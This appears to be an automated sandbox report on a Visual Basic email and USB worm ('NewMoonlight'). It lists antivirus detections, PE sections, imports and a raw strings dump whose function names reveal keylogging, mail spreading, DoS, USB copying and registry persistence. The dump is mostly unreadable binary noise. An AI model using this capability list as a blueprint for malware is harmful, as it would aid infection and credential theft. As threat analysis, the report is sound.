1.1
低危
DACN
0.12
FACILE
1.00
IMCLNet
0.63
MFGraph
0.00
反病毒引擎
| 查杀引擎 | 查杀结果 | 查杀时间 | 查杀版本 |
|---|---|---|---|
| Alibaba | None | 20190527 | 0.3.0.5 |
| Avast | Win32:Trojan-gen | 20200206 | 18.4.3895.0 |
| Baidu | Win32.Worm.VB.a | 20190318 | 1.0.0.2 |
| CrowdStrike | win/malicious_confidence_100% (D) | 20190702 | 1.0 |
| Kingsoft | None | 20200206 | 2013.8.14.323 |
| McAfee | W32/MoonLight.worm.b | 20200206 | 6.0.6.653 |
| Tencent | Malware.Win32.Gencirc.10b63abd | 20200206 | 1.0.0.1 |
静态指标
可执行文件包含未知的 PE 段名称,可能指示打包器(可能是误报)
(3 个事件)
| section | HSP0 |
| section | HSP1 |
| section | .imports |
文件包含未知的 PE 资源名称,可能指示打包器
(2 个事件)
| resource name | MIDI |
| resource name | ZIP |
动态指标
网络通信
与未执行 DNS 查询的主机进行通信
(1 个事件)
| host | 114.114.114.114 | |||
文件已被 VirusTotal 上 60 个反病毒引擎识别为恶意
(50 out of 60 个事件)
| ALYac | Trojan.GenericKD.41297369 |
| APEX | Malicious |
| AVG | Win32:Trojan-gen |
| Acronis | suspicious |
| Ad-Aware | Trojan.GenericKD.41297369 |
| AhnLab-V3 | Worm/Win32.AutoRun.R241883 |
| Arcabit | Trojan.Generic.D27625D9 |
| Avast | Win32:Trojan-gen |
| Avira | TR/BAS.Samca.ayzfu |
| Baidu | Win32.Worm.VB.a |
| BitDefender | Trojan.GenericKD.41297369 |
| BitDefenderTheta | AI:Packer.F8CE1E521D |
| Bkav | W32.AIDetectVM.malware |
| CAT-QuickHeal | Trojan.Sigmal.S6388985 |
| CMC | Email-Worm.Win32.VB!O |
| ClamAV | Win.Malware.Lmvwkprng-6742707-0 |
| Comodo | Packed.Win32.MUPX.Gen@24tbus |
| CrowdStrike | win/malicious_confidence_100% (D) |
| Cybereason | malicious.d9a958 |
| Cylance | Unsafe |
| Cyren | W32/Noon.K.gen!Eldorado |
| DrWeb | Trojan.DownLoader6.64360 |
| ESET-NOD32 | Win32/NoonLight.Y |
| Emsisoft | Trojan.GenericKD.41297369 (B) |
| Endgame | malicious (high confidence) |
| F-Prot | W32/VB-Backdoor-HRS-based!Maxim |
| F-Secure | Trojan.TR/BAS.Samca.ayzfu |
| FireEye | Generic.mg.124ee91d9a958586 |
| Fortinet | W32/Moonlight.B!worm |
| GData | Trojan.GenericKD.41297369 |
| Ikarus | Trojan.Win32.Patched |
| Invincea | heuristic |
| Jiangmin | Worm/VB.a |
| K7AntiVirus | Trojan ( 0040f6141 ) |
| Kaspersky | Email-Worm.Win32.VB.co |
| MAX | malware (ai score=80) |
| Malwarebytes | Worm.Agent |
| MaxSecure | Win.MxResIcn.Heur.Gen |
| McAfee | W32/MoonLight.worm.b |
| McAfee-GW-Edition | BehavesLike.Win32.MoonLight.fh |
| MicroWorld-eScan | Trojan.GenericKD.41297369 |
| Microsoft | Worm:Win32/Lightmoon.H |
| NANO-Antivirus | Trojan.Win32.VB.foifdq |
| Panda | W32/Moonlight.P.worm |
| Qihoo-360 | QVM41.1.Malware.Gen |
| Rising | Worm.VBInjectEx!1.99E6 (CLASSIC) |
| SUPERAntiSpyware | Worm.MoonLight/Variant |
| Sangfor | Malware |
| SentinelOne | DFI - Malicious PE |
| Sophos | W32/Bobandy-I |
二进制图像
288x288
224x224
192x192
160x160
128x128
96x96
64x64
32x32
运行截图
暂无运行截图
该样本运行过程中未生成截图
PE Compile Time
2007-01-09 09:10:21
PE Imphash
8fdfdc49a8e6746c0d29e7ec135a6204
Sections
| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
|---|---|---|---|---|
| HSP0 | 0x00001000 | 0x0002c000 | 0x0002c000 | 5.756509308700437 |
| HSP1 | 0x0002d000 | 0x0001f000 | 0x0001ec00 | 6.578913358656656 |
| .rsrc | 0x0004c000 | 0x00003000 | 0x00002200 | 4.040850426881186 |
| .imports | 0x0004f000 | 0x00001000 | 0x00000a00 | 4.023603122426431 |
Resources
| Name | Offset | Size | Language | Sub-language | File type |
|---|---|---|---|---|---|
| MIDI | 0x00047530 | 0x000021b0 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
| ZIP | 0x00037130 | 0x00010400 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
| RT_ICON | 0x0004d008 | 0x00000ea8 | LANG_NEUTRAL | SUBLANG_NEUTRAL | None |
| RT_ICON | 0x0004d008 | 0x00000ea8 | LANG_NEUTRAL | SUBLANG_NEUTRAL | None |
| RT_ICON | 0x0004d008 | 0x00000ea8 | LANG_NEUTRAL | SUBLANG_NEUTRAL | None |
| RT_GROUP_ICON | 0x0004deb4 | 0x00000030 | LANG_NEUTRAL | SUBLANG_NEUTRAL | None |
| RT_VERSION | 0x0004dee8 | 0x00000258 | LANG_ENGLISH | SUBLANG_ENGLISH_US | None |
Imports
Library MSVBVM60.DLL:
• 0x401000 __vbaVarSub
• 0x401004 __vbaVarTstGt
• 0x401008 __vbaStrI2
• 0x40100c _CIcos
• 0x401010 _adj_fptan
• 0x401014 __vbaStrI4
• 0x401018 __vbaVarMove
• 0x40101c __vbaVarVargNofree
• 0x401020 __vbaAryMove
• 0x401024 __vbaFreeVar
• 0x401028 __vbaStrVarMove
• 0x40102c __vbaLenBstr
• 0x401030 __vbaPut3
• 0x401034 __vbaEnd
• 0x401038 __vbaFreeVarList
• 0x40103c _adj_fdiv_m64
• 0x401040 __vbaPut4
• 0x401044 __vbaFreeObjList
• 0x401048 None
• 0x40104c _adj_fprem1
• 0x401050 __vbaRecAnsiToUni
• 0x401054 None
• 0x401058 None
• 0x40105c __vbaVarCmpNe
• 0x401060 __vbaStrCat
• 0x401064 None
• 0x401068 __vbaLsetFixstr
• 0x40106c __vbaRecDestruct
• 0x401070 __vbaSetSystemError
• 0x401074 __vbaNameFile
• 0x401078 __vbaHresultCheckObj
• 0x40107c __vbaLenVar
• 0x401080 _adj_fdiv_m32
• 0x401084 __vbaVarXor
• 0x401088 __vbaAryDestruct
• 0x40108c __vbaVarIndexLoadRefLock
• 0x401090 None
• 0x401094 __vbaVarForInit
• 0x401098 __vbaExitProc
• 0x40109c None
• 0x4010a0 __vbaObjSet
• 0x4010a4 __vbaStrLike
• 0x4010a8 __vbaOnError
• 0x4010ac None
• 0x4010b0 _adj_fdiv_m16i
• 0x4010b4 __vbaObjSetAddref
• 0x4010b8 _adj_fdivr_m16i
• 0x4010bc __vbaVarIndexLoad
• 0x4010c0 None
• 0x4010c4 __vbaStrFixstr
• 0x4010c8 None
• 0x4010cc __vbaVargVar
• 0x4010d0 __vbaBoolVarNull
• 0x4010d4 __vbaRefVarAry
• 0x4010d8 _CIsin
• 0x4010dc None
• 0x4010e0 None
• 0x4010e4 __vbaErase
• 0x4010e8 __vbaVarZero
• 0x4010ec None
• 0x4010f0 None
• 0x4010f4 __vbaChkstk
• 0x4010f8 None
• 0x4010fc __vbaGosubFree
• 0x401100 __vbaFileClose
• 0x401104 EVENT_SINK_AddRef
• 0x401108 None
• 0x40110c None
• 0x401110 __vbaGet3
• 0x401114 __vbaStrCmp
• 0x401118 None
• 0x40111c __vbaAryConstruct2
• 0x401120 __vbaGet4
• 0x401124 __vbaVarTstEq
• 0x401128 __vbaPutOwner3
• 0x40112c None
• 0x401130 __vbaObjVar
• 0x401134 DllFunctionCall
• 0x401138 __vbaVarLateMemSt
• 0x40113c __vbaVarOr
• 0x401140 _adj_fpatan
• 0x401144 __vbaFixstrConstruct
• 0x401148 __vbaRedim
• 0x40114c __vbaRecUniToAnsi
• 0x401150 EVENT_SINK_Release
• 0x401154 __vbaNew
• 0x401158 None
• 0x40115c None
• 0x401160 _CIsqrt
• 0x401164 __vbaVarAnd
• 0x401168 EVENT_SINK_QueryInterface
• 0x40116c __vbaStrUI1
• 0x401170 __vbaVarMul
• 0x401174 __vbaExceptHandler
• 0x401178 None
• 0x40117c __vbaPrintFile
• 0x401180 __vbaStrToUnicode
• 0x401184 None
• 0x401188 None
• 0x40118c _adj_fprem
• 0x401190 _adj_fdivr_m64
• 0x401194 __vbaGosub
• 0x401198 None
• 0x40119c None
• 0x4011a0 None
• 0x4011a4 __vbaFPException
• 0x4011a8 __vbaInStrVar
• 0x4011ac __vbaUbound
• 0x4011b0 __vbaStrVarVal
• 0x4011b4 __vbaGetOwner3
• 0x4011b8 __vbaVarCat
• 0x4011bc None
• 0x4011c0 __vbaI2Var
• 0x4011c4 None
• 0x4011c8 None
• 0x4011cc _CIlog
• 0x4011d0 __vbaFileOpen
• 0x4011d4 None
• 0x4011d8 __vbaR8Str
• 0x4011dc __vbaVar2Vec
• 0x4011e0 __vbaInStr
• 0x4011e4 None
• 0x4011e8 __vbaNew2
• 0x4011ec _adj_fdiv_m32i
• 0x4011f0 None
• 0x4011f4 _adj_fdivr_m32i
• 0x4011f8 __vbaStrCopy
• 0x4011fc None
• 0x401200 __vbaFreeStrList
• 0x401204 _adj_fdivr_m32
• 0x401208 __vbaPowerR8
• 0x40120c _adj_fdiv_r
• 0x401210 None
• 0x401214 None
• 0x401218 __vbaVarTstNe
• 0x40121c __vbaVarSetVar
• 0x401220 __vbaI4Var
• 0x401224 __vbaVarCmpEq
• 0x401228 None
• 0x40122c __vbaAryLock
• 0x401230 __vbaLateMemCall
• 0x401234 __vbaVarAdd
• 0x401238 None
• 0x40123c __vbaStrToAnsi
• 0x401240 __vbaVarDup
• 0x401244 __vbaVarMod
• 0x401248 __vbaFpI4
• 0x40124c __vbaVarLateMemCallLd
• 0x401250 __vbaVarCopy
• 0x401254 None
• 0x401258 __vbaRecDestructAnsi
• 0x40125c __vbaVarSetObjAddref
• 0x401260 __vbaLateMemCallLd
• 0x401264 __vbaR8IntI2
• 0x401268 None
• 0x40126c _CIatan
• 0x401270 None
• 0x401274 __vbaStrMove
• 0x401278 None
• 0x40127c __vbaStrVarCopy
• 0x401280 None
• 0x401284 None
• 0x401288 _allmul
• 0x40128c _CItan
• 0x401290 None
• 0x401294 __vbaUI1Var
• 0x401298 __vbaAryUnlock
• 0x40129c __vbaVarForNext
• 0x4012a0 _CIexp
• 0x4012a4 __vbaI4ErrVar
• 0x4012a8 None
• 0x4012ac __vbaFreeStr
• 0x4012b0 __vbaFreeObj
L!This program cannot be run in DOS mN
.imports
NewMoonlight
FrmMain
ddddddddddddd
IIIIIIIIIIIIIId7I
ttttttttj
<<<<<<<T
1111111(o
Id7(1IIIIIIIIIIII
IIIII`
[fPFMlllll
[sTtpk_glllll
[wwwwnhGFlllll
[i>wTTTTTTTTwpNIMlll
[i)<<<<<<<<<<<<<<:nK_l
[i}<<<<<<<<<<<<<<<<<wl
[c*(((((((((((((((((wl
[>6cj0
"' 6Hx
.LjR=W
.Jbjx=l
[[[[[Y
[[[[[[
[[[[[[[
[q~b[Fllll
[c}ha[]dlll
[f}nKB\`lll
[f}ttttttttttnKG[llll
[@SStha[llll
[XwwwwwwwwwwwwwwSSSTTpNJBllll
[SSSSSSSSSSSSSSTTTTTTTTT:kK^l
[<<<<<<<<<<<<<<<<<<<<<<<<<<u9l
[A><<<<<<<<<<<<<<<<<<<<<<<<<<l
[V211111111111111111111111111l
[2(((((((((((((((((((((((((([l
[|%##########################Kl
[*'5[Dj{
"'/5H[DPY
! 6J[[Lj=
! 6J[[DDDDl
-Yjoz{
[[[[[jxzW
[[[[[[[[
[[[[[[[[7
MS Sans Serif
TxtCaption
TmrKeyLog
TmrTungguconect
TmrDos
Timer3
Timer2
VB5! *
FILE FOLDER
NewMoonlight
6d":hNc
global
Utilities
ScanEmail
FrmMain
basRegistry
modInet
newSmtp
basService
keylog
ModSmtpEngine
Modzip
ModNetwork
ModMoonUpdate
Modmidi
Modhtt
NewMoonlight
shell32.dll
ShellExecuteA
kernel32
GetWindowsDirectoryA
GetSystemDirectoryA
user32.dll
EnumWindows
user32
EnableWindow
GetParent
ShowWindow
GetWindowTextA
GetClassNameA
SendMessageA
FindWindowA
WritePrivateProfileStringA
GetPrivateProfileStringA
+3q"=h
Da~:W~D9
$! *O3f
TmrKeyLog
+3qC:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
Timer2
TxtCaption
Timer3
TmrDos
TmrTungguconect
wininet.dll
InternetCheckConnectionA
GetDriveTypeA
instal
CopyWoRm
setMyRegister
KIllallVirri
CopyYourUfd
StartMailWorm
SelamatkanMsVb
EndTKMnUW
CreateMutex
kirimbo
taroocx
dRopingAnyFiles
shellbi
buatOtomatis
FindFirstFileA
FindNextFileA
FindClose
VBA6.DLL
__vbaAryDestruct
__vbaPut4
__vbaPutOwner3
__vbaFileClose
__vbaGetOwner3
__vbaFileOpen
__vbaRedim
__vbaExitProc
__vbaVarMod
__vbaLenBstr
__vbaOnError
__vbaVarForNext
__vbaVarXor
__vbaI4Var
__vbaLenVar
__vbaVarForInit
__vbaVarMove
__vbaStrVarCopy
__vbaVarVargNofree
__vbaVarTstNe
__vbaR8IntI2
__vbaStrVarVal
__vbaStrLike
__vbaObjSet
__vbaFreeObj
__vbaVarDup
__vbaHresultCheckObj
__vbaNew2
__vbaVarTstEq
__vbaFixstrConstruct
__vbaFreeVar
__vbaFreeStrList
__vbaStrToUnicode
__vbaSetSystemError
__vbaStrI4
__vbaStrCat
__vbaStrToAnsi
__vbaFreeVarList
__vbaVarCat
__vbaStrVarMove
__vbaStrCmp
__vbaUbound
__vbaFreeStr
__vbaStrMove
__vbaStrCopy
advapi32.dll
OpenSCManagerA
CreateServiceA
DeleteService
CloseServiceHandle
WNetOpenEnumA
OpenServiceA
ws2_32.dll
WSAAsyncSelect
listen
accept
icmp.dll
IcmpCreateFile
IcmpCloseHandle
IcmpSendEcho
WSAStartup
gethostbyname
WSACleanup
RtlMoveMemory
wsock32.dll
gethostbyaddr
inet_addr
ioctlsocket
socket
connect
closesocket
InternetOpenUrlA
InternetReadFile
InternetCloseHandle
InternetOpenA
InternetConnectA
__vbaGosubFree
__vbaGosub
__vbaVarIndexLoad
__vbaInStrVar
__vbaRefVarAry
__vbaErase
__vbaVarCopy
__vbaVarZero
moonlight.dll
ZpInit
ZpSetOptions
ZpGetOptions
ZpArchive
__vbaVarTstGt
__vbaVarCmpNe
__vbaVarCmpEq
__vbaVarOr
__vbaBoolVarNull
__vbaVarSub
__vbaVarAdd
__vbaObjVar
__vbaLateMemCall
__vbaVarLateMemCallLd
__vbaVargVar
__vbaLateMemCallLd
__vbaRecAnsiToUni
__vbaVarSetVar
__vbaInStr
__vbaVarSetObjAddref
__vbaLsetFixstr
__vbaStrFixstr
__vbaRecUniToAnsi
shell32
SHGetSpecialFolderLocation
SHGetPathFromIDListA
mpr.dll
WNetEnumResourceA
WNetCloseEnum
lstrlenA
lstrcpyA
WNetAddConnection2A
RegCloseKey
RegCreateKeyA
RegDeleteKeyA
RegDeleteValueA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
winmm.dll
mciExecute
mciSendStringA
GetAsyncKeyState
GetKeyState
Kernel32.dll
RegisterServiceProcess
__vbaStrI2
__vbaVar2Vec
__vbaAryMove
__vbaPrintFile
__vbaNameFile
__vbaObjSetAddref
__vbaAryUnlock
__vbaVarIndexLoadRefLock
__vbaVarAnd
__vbaEnd
__vbaFreeObjList
__vbaI4ErrVar
__vbaI2Var
__vbaR8Str
__vbaGet4
__vbaPowerR8
__vbaVarMul
__vbaAryConstruct2
__vbaStrUI1
__vbaAryLock
__vbaNew
__vbaVarLateMemSt
__vbaGet3
__vbaFpI4
__vbaRecDestructAnsi
__vbaUI1Var
__vbaRecDestruct
__vbaPut3
buffer
namafile
drive2
]]]]]]xhXH8(
EMPUQRPxhPQPXRP
HP8QRP(PQP
Q(R8PHQXRhPxQERMPUQRj
UPh$a@
EMPUQERMPUQERMPQj
UERMPUQERMPUQERPj
Q(R8PHQXRhPxQERMPUQRj
jXh`a@
URhta@
EMPUQERPj
MUQR~
EMPUQERMPQj
EM3PQuu
4SVWeE
MfE_^d
PSVWeE
E3SPuu
UQREhd@
EEEEEtdD4$
L<DTPD4
R$PUQR
ETRPUQR
T\MPUQR
dtPUQRj
tSVWeE
uuuuuuuU
PMQURPEPMQPUREPPMQURP
EPMQUREPMQj
UREPMQUREPj
USVWeE@
URhpd@
EPMQEE
EPhpd@
MQURofEfEfEj
,SVWeE
UPQERMPQh0C
uuuu|l\L<,
|lhXH8(
,<QLR\PlQ|RMPUQERMPUQRj
|uf|f9U
f;t%X0C
l|QRPQRPQRP
R,P<QLR\PlQ|RMPUQERMPUQRj
}}}}}tdTD4$
MUQERPj
uuuutdTD40
MQR|0ttH
EMPUQERPj
4DQTRdPtQERMPUQERPj
CSVWeE
URhxs@
SVWeEP
}}}}}|lE
j`h`a@
SVWeE`
}}}}}tdTD4$
MUQERPj
SVWeEp
MPQuuu
uuuuuutplhEu@
f;t3xh
ERPEu@
UQREu@
EMPUQR$
MxQERPE v@
hhtElPQpRtPUQRlp
LQ]]]]
plhd`\HT
tPQhd@
hlQpRPj
tQRhd@
tQRhd@
hlPpQRj
tQRhd@
PEPh[@
tRPhd@
DlpRPj
dPh|i@
d#hRlPpQRj
\UQER`PQ3
\`RhPlQpRPj
UQERMPHQhRPfhlQpRPj
t@QRhd@
@tQRhd@
dRh|i@
#hPlQpRPj
\ERMP`QR0
\`PhQlRpPQj
ERMPUQHRhPQRhlRpPQj
6\`QdRhPlQpRPj
=-SVWeE
P\PxQR
QRPQRj
uuuuu|xhXHD@0
PRPUQR
Q R0PQj
PUR0PQ
EEMP QR
MPQ0RP
RhP0QR
Pl|PUQR
Q R0PQj
l|PUQR
f;tgh0QR
0RP VQ
f9toh0QR
f9t9hP0QR
f9t9hR0PQ
Q R0PQj
P Q0RPj
f9t60C
0QRf50C
f;t*U1C
L@DPQj
Q R0PQj
l|RPQRj
fEPMQj
UREPMQ
P`R0P Q
PQPR@P
PPpQ`R
PpR@P0Q
fpPQRPQR
R PPQR`PpQRPQRP
Q0R`P@QPRpPMQUREPMQUR@PpQPR`PQRPQRP QPR0P@Q`RPQRPQ
Q R@Pj7
R0P@QPR`PpQRPQRPQRP
R P0Q@RPP`QpRPQRPQRPQ
P Q0R@PPQ`RpPQRPQRPQR
Q R0P@QPR`PpQRPQRPQRP
R P0Q@RPP`QpREPMQUREPMQURjL
}SVWeEP
fpUREPMQj
5UREPMQj
3UREPMQj
UREPMQURj
]]]]]|l\L<,
TSVWeE
E3PMuuu
MUVRME
MPQUVR
]]]]]|l\L<,
|xtplhd`\XTP
jPh`a@
E]EEPE
jXh`a@
P]PMh`@
MPEPPMh
MPUQERMPUQERMPQj
jhh`a@
Mp4VQPg(P
MPUQRj
MPUQRj
jXh`a@
EUERPuE
|ERMPUQRj
UER3MPQ
R,P<QLR\PlQ|RMPUQERPj
jXh`a@
EEMPQE
UQRPEMPQPUhX@
RPEh`@
UQERMPQj
MPUQRPEhd@
PPMh`@
ERMPUQRj
MPUQERMPUQERMPUQRj
R,P<QLR\PlQ|RMPUQERPj
=SVWeE
}#j|h`a@
}#jPh`a@
}#jXh`a@
MQUREPj
Q0R@PPQ`Rj
@QPR`Pj
@QPR`Pj
Q8Rhta@
Q8Rh @
}#jXh`a@
EPhta@
}#jXh`a@
URhta@
}#jXh`a@
MQhta@
}#jXh`a@
EPhta@
}#jXh`a@
URhta@
}#jXh`a@
MQhta@
PR0P Q
P@Q0R P
fMQUREPMQUREPj
pQtRxP|QUREPj
P0Q@RPPQRPQR
R0PPQ@R`Pj
MQUREPMQUREPj
pQtRxP|QUREPj
pQRPQRPQRP
R P0Q@RPP`QpRPQRPQRPQ
P Q0R@PPQ`Rj
MQURVwEPMQj
UREPMQj
EPMQURj
MQUREPj
UREPMQj
EPMQURj
rUREPMQURj
MQUREPj
pEPMQURj
MQUREPj
UREPMQj
EPMQURj
MQUREPMQj
EPMQURj
3EPMQUREPj
MQUREPj
}SVWeE
EPMQURj
Q4RPMQtR
EPMQUREPMQUREPj
4QDRTPdQtREPMQURj
PREPMQ
EPMQUREPj
$QTR4PDQdREPtQUREPj
$R4PDQTRdPtQUREPMQj
PMQh01C
4QDRTPdQtREPMQURj
PMQh\@
PMQhx@
PMQh`@
REPh`@
QURh`@
EPMQUREPMQj
UREPMQj
EPMQUREPMQj
UREPMQj
EPMQURj
iMQUREPMQUREPMQj
$R4PDQTRdPtQUREPMQj
R$P4QDRTPdQtREPj
fEfMf;
fEfMf;
EPMQUR
$P4QDRTPdQtRPQRPQRPQ
P$Q4RDPTQdRtPMQj
]SVWeE
MQtRdP,Q<REP
EPMQUR
`EPTQXR\P`QURc^M
,P<QUR
SVWeEX
URQ\E}
UREP8=MQURj
xPMQURj
EPMQ;UREPMQj
xREPMQj
PPPTQ3P
PHRLP3P
P@QDRd3P
EPMQUREPMQUREPMQUREPj
,MQURj
MQUREPMQUREPMQUREPMQj
,xREPMQj
EPMQUR
fMQUREPj
}#jXh`a@
MQhta@
UREPMQURj
UR$PMQ
URPQRPMQxQUREPj
}#jXh`a@
MQhta@
UREPMQURj
EPMQUR
dPtQTR
PTPQDR
fTQdRtPMQUREPj
fzRu)E
}#jXh`a@
EPhta@
MQUREPj
EPMQUR
fMQUREPj
BTu E
[MQURj
4PDQTRdPtQUREPMQURj
]]]]]p`PLk
jXh`a@
URhta@
EMPUQERPj
jXh`a@
EPhta@
3Mf9LUQR
PERMPUQERPj
pMPUQERMPUQRj
-}SVWeE
{SVWeE
SVWeEH
EMPQ5M
SVWeEX
jXh`a@
URhta@
EMPUQERPj
MUQERMPUQRj
vSVWeEh
}#j\h}@
}#jXh`a@
MQUREPMQj
tPMQ`W
}#j\h}@
UREPMQUREPj
TSVWeE
MPhls@
EMPQ/UERMPUQERMPQj
UERMPUQERMPQj
\SVWeE
j8h@a@
ERPEP@
j8h@a@
HSVWeE
QPUh`@
MPQPUh
ERMPUQRj
MjXha@
RPEh`@
PUQRPEh
MPUQERPj
MjXha@
PPMh01C
MPQPUh
UQERMPUQRj
MjXha@
PPMh01C
MPQPUh
UQERMPUQRj
MjXha@
MPQPUh
UQERMPUQRj
MPUQERMPQj
-hSVWeE
EPMQURj
EPMQURj
UREPMQj
EPMQURj
,SVWeE0
3MEEEE
MEQRPPVC5p
SVWeE@
MEPUQRu
MfE_^d
|SVWeEP
3Muuuu
uuuuuuuu
EUPQRuuPE
9uu?UME`@
UEPMVQVERP
MUQMERPVUQRE
UMQERPu
UMPQVERP
UQREVP
f;~.OE
EUQERPE
lSVWeE`
3M}}}}}
Mf0QfFEf
UERMPQ
UERMPQj
UERMPQj
SVWeEp
]f]]]]]]]|ldE
j`h`a@
dUERPj
dUERPj
ddERPj
UERMPUQRj
f:u'EP
EMPUQERPj
uuuuxhXH8(
U8RMPQ
EMPUQERPj
hxRMPUQERMPUQRj
MfE_^d
TPLD@<,&
<@PDQRj
-<@PDQRj
MfP_^d
]]]]]]]p
0Mf;0Q
HUEERj
MMMMxMQMQMEEEEQp
EMPUQRj
MUQERPj
hSVWeE
ERPhdl@
UERPhdl@
MfE_^d
MfE_^d
TSVWeE
f3}}}}
MUQERMPQj
~XUWRj
UERMPUQRj
uuuuul
MQft,U
9l~_EURUE
HSVWeE
0RPP@Q
0Q@RPP`QUREPj
pQUREPj
pQUREPj
MQpRpP
MQUREPMQUREPMQUREPMQj
,`REPMQj
pREPMQj
pQUREPj
UREPpQ
`QpR`P
PQRPQRP
P Q0RPP@Q`RpPMQURj
MQUREP
RFEPMQj
PR`PpQUREPj
pQUREP
R<EPMQj
PMQUREPMQURj
QBUREPj
pPMQUR
`PpQUREPj
PMQURj
`PpQUREPj
pPMQUR
pPMQURj
UREPMQUREPMQUREPMQURj
,PQRPQRPQ
P Q0R@PPQ`RpPMQURj
EEEEtd
UQRPjh
lfUMPUQERP
UERMPQj
t|EQUVERP
URPEM+
-SVWeE
PMQ]tE
dSVWeEh
3RhD~@
3RhPg@
3Rh`v@
3Rhls@
3Rhhd@
MPUQRj
UQERPj
SVWeEx
4R6(48
4R8P$Q
Q$R4PDQj
4R8P$Q
Q$R4PDQj
R$P4QDRj
TRXP\Q`RdPhQlRpPtQxR|PQj
Q4R$PDQj
P$Q4RDPj
$Q4RDPj
QREPXQ
PQURXPMQDR0P
TRXP\Q`RdPhQlRpPtQxR|PQj
4DRTPdQtRPQRPQRPQ
P$Q4RDPj
^SVWeE
EPfMQjj
URhls@
fUREPj
MQhls@
f?fME
MQhls@
TSVWeE @
f;t-Uh01C
EMPUQREM
mASVWeE @
EPMQUR
?SVWeE@ @
EPMQUR
]>SVWeE @
MfMfUf;U
UREPMQ
UfUfEf;|
xfMfUf;t
];SVWeE
`PpQUREPMQUREP
`QpREPMQUREPMQj
fMfUf;
`RpPMQUREPMQURj
8SVWeE`!@
PPhP2C
URh(3C
SVWeE@"@
MfE_^d
2SVWeEP"@
}#j$h@
\fMfUf;X
UREPMQj
URtPxQ|REPMQUREPMQj
/UREPMQj
UREPMQj
m.SVWeE"@
EPMQUREP
EfEfMf;M
M,SVWeE
QUREPMQf
fMfUf;
0P@QPR`P
}#j h@
0P@QPR`Pj
PMQRh0{@
PMQh0{@
PEPpQh0{@
pREPh0{@
xQ|REPMQURj
pRh0{@
PMQPRh0{@
PPMQh0{@
pRtPxQ|REPMQURj
PPh0{@
PUR0Ph0{@
0QURh0{@
pPtQxR|PMQUREPj
0Qh0{@
PMQh0{@
PMQRh0{@
PMQh0{@
fUfEf;
P QPR`P@Q
}#j h@
Q R0P@Q`RPPj
0P@QPR`P
}#j h@
0P@QPR`Pj
ppQtRxP|QUREPMQj
P Q0R@PPQ`Rj
pQh0{@
PRh0{@
0Ph0{@
EPh0{@
SVWeE#@
SVWeE#@
M+PUREP
SVWeE8$@
lP\QLR
P8QUR6
EPMQUR
LSVWeE$@
XSVWeE$@
RPPjh
SVWeE$@
EEEExXH8(E
`hXRHP(Q8RMPQ
EEEMPQ
HUQERPP
UERMPUQRj
(8PUQR
xUQERMPUQRj
SVWeE$@
MQUREPj
UREPMQj
EEEE|l\L<,
<MPUQR
P,MPQP
PUQRPMPQP|RP
PlQRP\LPQPj
L\RlP|QERMPUQERMPUQRj
@L\QlR|PUQERMPUQERMPQj
SVWeE %@
L!This program cannot be run in DOS mode.
uT3~#m#
Fm;|EP?L$
(!xm&_<[
W 6V@eKID-v?
<hTWePE$L;
(u$&$}
(!$-[n#
+x@;qt&
YT!99,@xt
|lhAmx`\
,1Td P
BHD dyN<8}@t0,AE
u)| V2
@ty u9
ygXw<'
_hHSHwrLY
$j (vpR
i2Dw+;
lQmQ$$;S
MPRHL{6
5S=3AR
;1;}#+$
Ct8~4
QRT-'E
QRK* H?c
^&N0F1
3^SW"x
Y~g_//NZ$M6]Omt
eEOu_[^(7_
'x}tC'>=
jUV~.=
}TQ;v5
azZeqW
I*tw5L{++
j.'XH:K
FQ>j)z
;W:HN?0T
r?c<F^%af
caw}-4U
4E~#=<t~;sv+`,wf9v
xvu)C+
+f]IPn8|rZ`
Q]'OuA3$
m<}oo9Hp
|Rs64|
4((Up`
EEU<Ot5g+=*9-5 -%9V
%wbb]OF#A?0K,hOAuA#t?Wsl
xk}3LP#
F$vw)!hz|
L~|m;v
PDEw]w
)U#P8=V
YF>?[ed]|`AG/u's[Pso_
khlrR_
O[T% yXJ
;u&PzW8
5rpuSQ
QV#$H!(=c2
="/t G
R[ j/P3Cq
)Rk#dShOP}LpQ<G`e7
}urVZ}\
<49"e W=E
,"D4Uh@TW
uAvD@W,
$%D;pwuuLQf
TolVZWEb
d3eG;G\HD
|$V0PY
.MXypH
DRP^(=
`sB=4[
C2PS%|kAKfPf
3;si",$$
34,gr47
\@;|;!V
A7.A.t
*8@$19
JP#<GH
SUU 0VWF!"f
D|adu C
f$S=jV0%
%W]Z=gfPC5
`S}o1C</tK<:tG<\tCAg~
k6RV-(u
C]|ob
Q3;WucO(
S3;vM8\
Pq\qPtI\
]4}wgc
3;tbFVY&
!8[T~4ShX$(V
30@.4o3q*Sn oe~
V)L;G[M
V",E[Hb
zuFQD.
Wxipw#|
Wc<R]0
BQujVfzu
&;9$I W
j 9y:P
q2!WV\`5
-kF:WGu
jf#CH(
YNs^(
jovhJhB$
.Xl73BWM
v |,-g&
H|v<#w>
` !H@uf
ldf:u;,"g
;w`i+\$tSz@iJ
Wj3,xD
HABQ@6hg6Cd
;@P|B!}Z
mGgO`I t
'gU4*L0|I<aIk4=
vEUaL{Ur%u
=bS( UN(
>|x@;~
0z+eO<
u^3?.O
N;"~0a
8Ut\Ot%%+
*)F7n2
S5~U]H
VW,=<t
CB#;t<CF
"9|jW@
F|MUUV|7
;`p}&:+
^)0P=Nuy8&
RP-Pp*rc
j"=tLv!wL
0x^.2=zC@
OFb?P"V
SH5=vbd
QN}urbqZw
!{x`u%
@>nkY-VP
x|_{f]s:f?
L|:w,,
Xd "Tv8v
VjhA|M
y@P)*)Tk3
",N7J8
cY0*9sf
(7f_%8;
X[H;r!4
797;~AW
r;rEPw1m
<SVX'%n
<?t#<*t <[t
]\k][?u
PoA7*uV>
q-FRW<[
]FI?(-;
sEl`IXt;
/iq;. SRVgP
n}U<!f75S
W\;r0,
y@raT-
.?vvA*
+u3/ +W
]v.FG]mUsne
WSTw~p
P%P\t
\(e(@bQpR$6E
74bgvu_2
",T4R%d{
#m4u_!P%
A`=Zx\GO0u
((VW8hWHL
RWPujI|xoT
9=POFT>
]Q nN| $VR_w
/4{!^]5,
[PSc5M
bt!3l(\*sM
PRSJ2ddrY0'[t
&z2HlIT
BdQ1t!
Z{;^HUY~6
*-bDt/
8<PYi(t
P0Im-,=_
cQPH$@E
-e<rH^
UV`Wux
""cI\E
+Z(V\$$
I)H;`v
